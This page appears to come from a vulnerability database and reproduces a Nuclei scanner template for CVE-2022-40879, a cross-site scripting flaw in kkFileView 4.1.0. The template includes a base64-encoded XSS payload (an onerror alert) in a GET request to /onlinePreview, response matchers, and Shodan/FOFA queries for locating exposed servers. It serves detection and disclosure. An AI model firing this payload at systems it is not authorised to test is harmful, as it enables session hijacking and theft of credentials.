Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-40879HistoryOct 25, 2022 - 9:53 a.m.
kkFileView 4.1.0 - Cross-Site Scripting
2022-10-2509:53:25
ProjectDiscovery
github.com
6
cve
cve2022
kkfileview
xss
keking
security
vulnerability
patch
exploitation
script
authentication
credential
attack
remediation
upgrade
patched version
security patches
mitigate.
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.4 Medium
AI Score
Confidence
High
0.016 Low
EPSS
Percentile
87.4%
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2022-40879
info:
name: kkFileView 4.1.0 - Cross-Site Scripting
author: arafatansari,co5mos
severity: medium
description: |
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability.
reference:
- https://github.com/kekingcn/kkFileView/issues/389
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Henry4E36/POCS
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-40879
cwe-id: CWE-79
epss-score: 0.01698
epss-percentile: 0.8773
cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: keking
product: kkfileview
shodan-query:
- http.html:"kkFileView"
- http.html:"kkfileview"
fofa-query:
- body="kkfileview"
- app="kkfileview"
tags: cve,cve2022,kkFileView,xss,keking
http:
- method: GET
path:
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- 'θ―₯ζδ»ΆδΈ'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402205ff051a290a7b4323e101e8ecd1c1f705567e277eb9273290025454f35dda57e0220568ee1117cb034a32c1a75b9aec933f935242a50a6d4e86a0722bcbea68af77e:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2022-40879
2022-09-29 16:22:54
prion
prion
Cross site scripting
2022-09-29 17:15:00
osv
osv
CVE-2022-40879
2022-09-29 17:15:54
cve
cve
CVE-2022-40879
2022-09-29 17:15:54
nvd
nvd
CVE-2022-40879
2022-09-29 17:15:54
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.4 Medium
AI Score
Confidence
High
0.016 Low
EPSS
Percentile
87.4%
Related for NUCLEI:CVE-2022-40879